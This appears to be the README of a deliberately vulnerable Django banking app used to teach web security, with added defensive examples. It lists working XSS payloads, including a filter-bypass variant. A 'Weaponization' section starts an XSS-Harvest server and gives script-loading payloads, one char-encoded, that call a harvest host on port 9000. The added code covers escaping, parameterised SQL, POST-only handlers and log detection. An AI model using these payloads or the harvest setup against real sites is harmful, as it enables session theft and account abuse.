Miserlou / Exploitable

Licence: other
A Django application full of security holes for instructional purposes

Exploitable

A Django application full of security holes for instructional purposes.

Cross Site Scripting (XSS)

In the 'Branch Finder' there is a reflected XSS, and in the profile page there is a persistent XSS.

Reflected

"){}; }; alert("jello");  //

Persistent

<scrscriptipt>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 115, 109, 101, 108, 108, 111, 39, 41, 59))</scrscriptipt>
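
Why these two payloads work, and what the fix for each looks like, as an added example (this is not code from the Exploitable project). The persistent payload is written for a blacklist filter that deletes the word "script" once: `<scrscriptipt>` collapses into `<script>`. The reflected payload is written for a JavaScript string context, where the closing quote and `//` comment let the rest of the line be rewritten. The `findBranches("...")` template below is an assumed context for the Branch Finder, not the project's actual template; the fix functions use only the Python standard library.

```python
import html
import json
import re

# Both payloads are copied from the README and used here as constructed test input.
PERSISTENT_PAYLOAD = (
    "<scrscriptipt>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 115, "
    "109, 101, 108, 108, 111, 39, 41, 59))</scrscriptipt>"
)
REFLECTED_PAYLOAD = '"){}; }; alert("jello");  //'


def naive_strip_filter(value: str) -> str:
    """Blacklist filtering: delete the word 'script'. A single pass over the input
    means a nested spelling such as <scrscriptipt> collapses into a real <script>."""
    return re.sub(r"script", "", value, flags=re.IGNORECASE)


def filter_bypassed(payload: str) -> bool:
    """True when the blacklist lets an executable <script> element through."""
    return "<script>" in naive_strip_filter(payload).lower()


def render_html_text(value: str) -> str:
    """Fix for an HTML text or attribute context: encode the significant characters
    instead of trying to remove bad words. Django templates do this by default
    unless a value is marked safe."""
    return html.escape(value, quote=True)


def render_js_string_literal(value: str) -> str:
    """Fix for a JavaScript string literal inside a <script> block. HTML entity
    encoding is the wrong tool here: the HTML parser does not decode entities
    inside <script>, and inside an inline event-handler attribute it decodes them
    before the JavaScript runs, so the quote comes back. Encode for the actual
    context: a JSON string literal, with <, > and & hex-escaped so the literal can
    never close the element. This mirrors Django's json_script filter."""
    encoded = json.dumps(value)
    return encoded.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


def vulnerable_branch_finder_script(query: str) -> str:
    """Hypothetical Branch Finder template (assumed, not the project's): the search
    term is pasted straight into a JavaScript string literal."""
    return 'findBranches("%s");' % query


def fixed_branch_finder_script(query: str) -> str:
    """Same template, with the value emitted as a JSON-encoded literal."""
    return "findBranches(%s);" % render_js_string_literal(query)


if __name__ == "__main__":
    print("blacklist bypassed:", filter_bypassed(PERSISTENT_PAYLOAD))
    print("escaped:           ", render_html_text(PERSISTENT_PAYLOAD))
    print("broken script:     ", vulnerable_branch_finder_script(REFLECTED_PAYLOAD))
    print("fixed script:      ", fixed_branch_finder_script(REFLECTED_PAYLOAD))
```

The takeaway for a reviewer of the real application is that the fix is chosen by output context, not by input content: an HTML text node gets entity encoding, a script literal gets JSON encoding with the three angle-bracket and ampersand escapes, and neither fix needs to know what the payload looks like.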

Resources

Cross Site Request Forgery (CSRF)

Transferring funds can be done with a CSRF-unprotected GET request.

SQL Injection (SQLi)

Depositing funds can be used to deliver an SQL injection.
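
The hardened shape of both money-moving endpoints, as an added example that is not the project's code. It covers the two findings above: the deposit amount is validated and then bound as a query parameter, so the statement text never changes with user input, and the state-changing handler refuses anything but POST, which is the gate a GET-triggered transfer bypasses. The in-memory SQLite schema, account rows and form values are constructed for the example; in Django the equivalents are the ORM (or `cursor.execute(sql, params)`), `@require_POST` and `CsrfViewMiddleware`.

```python
import sqlite3
from decimal import Decimal, InvalidOperation


def make_bank() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the application's accounts table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE accounts (id INTEGER PRIMARY KEY, owner TEXT NOT NULL, "
        "balance_cents INTEGER NOT NULL)"
    )
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?, ?)",
        [(1, "alice", 10_000), (2, "bob", 500)],
    )
    conn.commit()
    return conn


def parse_amount_cents(raw: str) -> int:
    """Validate the form field before it gets anywhere near SQL: a positive, finite
    decimal with at most two fractional digits, returned as whole cents."""
    try:
        amount = Decimal(raw.strip())
    except InvalidOperation:
        raise ValueError(f"amount is not a number: {raw!r}") from None
    # is_finite() is checked first: comparing NaN with <= raises in Decimal.
    if not amount.is_finite() or amount <= 0:
        raise ValueError("amount must be a positive finite number")
    cents = amount * 100
    if cents != cents.to_integral_value():
        raise ValueError("amount may have at most two decimal places")
    return int(cents)


def rejects(raw: str) -> bool:
    """True when the validator refuses the input (used for the checks below)."""
    try:
        parse_amount_cents(raw)
    except ValueError:
        return True
    return False


def build_deposit_sql_unsafe(account_id: str, raw_amount: str) -> str:
    """The defect class behind the README's deposit form: form fields concatenated
    into SQL text, so the database cannot tell data from query. Shown for contrast
    only and never executed here."""
    return (
        f"UPDATE accounts SET balance_cents = balance_cents + {raw_amount} "
        f"WHERE id = {account_id}"
    )


def balance_cents(conn: sqlite3.Connection, account_id: int) -> int:
    row = conn.execute(
        "SELECT balance_cents FROM accounts WHERE id = ?", (int(account_id),)
    ).fetchone()
    if row is None:
        raise LookupError(f"no account {account_id}")
    return row[0]


def deposit_safe(conn: sqlite3.Connection, account_id, raw_amount: str) -> int:
    """Hardened deposit: validate, then bind parameters. The statement text is a
    constant and the values travel separately, which is what the Django ORM does."""
    cents = parse_amount_cents(raw_amount)
    account_id = int(account_id)  # non-numeric ids fail here, not inside SQL
    cur = conn.execute(
        "UPDATE accounts SET balance_cents = balance_cents + ? WHERE id = ?",
        (cents, account_id),
    )
    if cur.rowcount != 1:
        conn.rollback()
        raise LookupError(f"no account {account_id}")
    conn.commit()
    return balance_cents(conn, account_id)


def handle_deposit(conn: sqlite3.Connection, method: str, form: dict) -> int:
    """A state-changing endpoint must not be reachable by GET: a GET fires from an
    <img> or a link on any site, which is the CSRF the README's transfer has. In
    Django this is @require_POST plus CsrfViewMiddleware's token check."""
    if method.upper() != "POST":
        raise PermissionError("deposit requires POST")
    return deposit_safe(conn, form["account_id"], form["amount"])


def get_is_blocked(conn: sqlite3.Connection) -> bool:
    """True when a GET to the deposit handler is refused before touching the DB."""
    try:
        handle_deposit(conn, "GET", {"account_id": "1", "amount": "1.00"})
    except PermissionError:
        return True
    return False


if __name__ == "__main__":
    bank = make_bank()
    print(handle_deposit(bank, "POST", {"account_id": "2", "amount": "1.00"}))
    print("GET blocked:", get_is_blocked(bank))
    print("unsafe statement:", build_deposit_sql_unsafe("1", "100 abc"))
```

Validation and parameter binding are separate defences: the validator keeps garbage out of the business logic and gives the user a clean error, while binding is what removes the injection class even when a future field is not validated.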

Resources

Weaponization

First, install XSS-Harvest: https://github.com/Miserlou/XSS-Harvest

Start Harvest Server

 ./xss-harvest.pl -l -p 9000 -r http://localhost:8000/accounts/signin/

Deliver Exploit Payload

<script src="http://localhost:9000/i"></script>

JavaScript Payload Delivery (with jQuery)

$.getScript("http://localhost:9000/i", function(){});

Char Encoded Payload Delivery

<script>eval(String.fromCharCode(36, 46, 103, 101, 116, 83, 99, 114, 105, 112, 116, 40, 34, 104, 116, 116, 112, 58, 47, 47, 108, 111, 99, 97, 108, 104, 111, 115, 116, 58, 57, 48, 48, 48, 47, 105, 34, 44, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 123, 125, 41, 59));</script>
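
From the defender's side, the char-encoded delivery above is what an analyst meets in access logs: URL-encoded, built with String.fromCharCode, and opaque until decoded. The following is an added example (not part of XSS-Harvest or the Exploitable project) that normalizes the query string of each request line and reports XSS indicators. The three combined-format log lines are constructed for the example; the second carries the README's char-encoded delivery payload in the Branch Finder's query parameter, and the third carries the README's persistent profile payload. The parameter names `q` and `bio` are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Matches String.fromCharCode(97, 108, ...) with any spacing between the codes.
CHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([0-9\s,]+)\)", re.IGNORECASE)

# Substrings worth flagging once a value has been URL-decoded and char-code-expanded.
# Matching on eval( and the loader call, not only on <script, is what catches the
# README's <scrscriptipt> spelling, which never contains the literal tag.
INDICATORS = ("<script", "eval(", ".getscript(", "javascript:", "onerror=")

# Request line of a combined-format access log: method, target, protocol.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (see the lead-in for what each one carries).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /branches/?q=Boston HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:12:00:05 +0000] "GET /branches/?q=%3Cscript%3Eeval(String.fromCharCode(36,46,103,101,116,83,99,114,105,112,116,40,34,104,116,116,112,58,47,47,108,111,99,97,108,104,111,115,116,58,57,48,48,48,47,105,34,44,32,102,117,110,99,116,105,111,110,40,41,123,125,41,59));%3C/script%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:12:00:09 +0000] "GET /accounts/profile/?bio=%3Cscrscriptipt%3Eeval(String.fromCharCode(97,108,101,114,116,40,39,115,109,101,108,108,111,39,41,59))%3C/scrscriptipt%3E HTTP/1.1" 200 128 "-" "Mozilla/5.0"',
]


def decode_charcode(text: str) -> str:
    """Replace each String.fromCharCode(...) call with the string it would build."""
    def expand(match: re.Match) -> str:
        codes = [int(c) for c in match.group(1).split(",") if c.strip()]
        return "".join(chr(c) for c in codes if c <= 0x10FFFF)
    return CHARCODE_RE.sub(expand, text)


def normalize(value: str) -> str:
    """Undo the layers the delivery adds: URL encoding (twice, to cover double
    encoding) and char-code construction. Matching happens on this form."""
    return decode_charcode(unquote_plus(unquote_plus(value)))


def scan_log_line(line: str) -> dict:
    """Return the request's path, the decoded query string and indicators found."""
    m = LOG_RE.search(line)
    if m is None:
        return {"method": None, "path": None, "decoded": "", "indicators": []}
    path, _, query = m.group("target").partition("?")
    url_decoded = unquote_plus(unquote_plus(query))
    decoded = decode_charcode(url_decoded)
    hits = [ind for ind in INDICATORS if ind in decoded.lower()]
    if CHARCODE_RE.search(url_decoded):
        hits.append("string.fromcharcode")
    return {"method": m.group("method"), "path": path, "decoded": decoded, "indicators": hits}


def scan_log(lines) -> list:
    """Flagged entries only, in log order."""
    return [r for r in (scan_log_line(line) for line in lines) if r["indicators"]]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["path"], hit["indicators"])
        print("   ", hit["decoded"])
```

Decoding before matching is the whole point: a rule that looks for `<script` in the raw request line misses both sample payloads, while the normalized form exposes the loader URL (`http://localhost:9000/i`) that an incident responder needs to block and to search for elsewhere.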